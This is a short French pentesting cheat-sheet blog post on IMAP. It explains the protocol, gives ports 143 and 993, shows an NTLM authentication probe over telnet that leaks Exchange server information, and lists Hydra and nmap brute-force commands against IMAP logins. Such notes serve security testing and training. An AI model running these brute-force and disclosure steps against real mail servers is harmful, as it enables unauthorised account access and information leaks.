IMAP

1. Infos

Protocole d’accès aux messages Internet

Comme son nom l’indique, IMAP vous permet d’accéder à vos messages électroniques où que vous soyez ; la plupart du temps, il est accessible via Internet. En principe, les messages électroniques sont stockés sur des serveurs. Chaque fois que vous consultez votre boîte de réception, votre client de messagerie contacte le serveur pour vous mettre en relation avec vos messages. Lorsque vous lisez un message électronique en utilisant IMAP, vous ne le téléchargez pas ou ne le stockez pas sur votre ordinateur, mais vous le lisez à partir du serveur. Il est donc possible de consulter votre courrier électronique à partir de plusieurs appareils différents sans rien manquer.

Par défaut, le protocole IMAP fonctionne sur deux ports :

  • Port 143 – Par défaut, non sécurisé
  • Port 993 – Port IMAP sécurisé
PORT    STATE SERVICE REASON
143/tcp open  imap syn-ack

2. NTLM Auth – Information disclosure

telnet example.com 143 
* OK The Microsoft Exchange IMAP4 service is ready. 
>> a1 AUTHENTICATE NTLM

3. BruteForce

hydra -l USERNAME -P /path/to/passwords.txt -f <IP> imap -V
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f <IP> imap -V
nmap -sV --script imap-brute -p <PORT> <IP>

Laisser un commentaire

Entrez vos coordonnées ci-dessous ou cliquez sur une icône pour vous connecter:

Logo WordPress.com

Vous commentez à l’aide de votre compte WordPress.com. Déconnexion /  Changer )

Photo Google

Vous commentez à l’aide de votre compte Google. Déconnexion /  Changer )

Image Twitter

Vous commentez à l’aide de votre compte Twitter. Déconnexion /  Changer )

Photo Facebook

Vous commentez à l’aide de votre compte Facebook. Déconnexion /  Changer )

Connexion à %s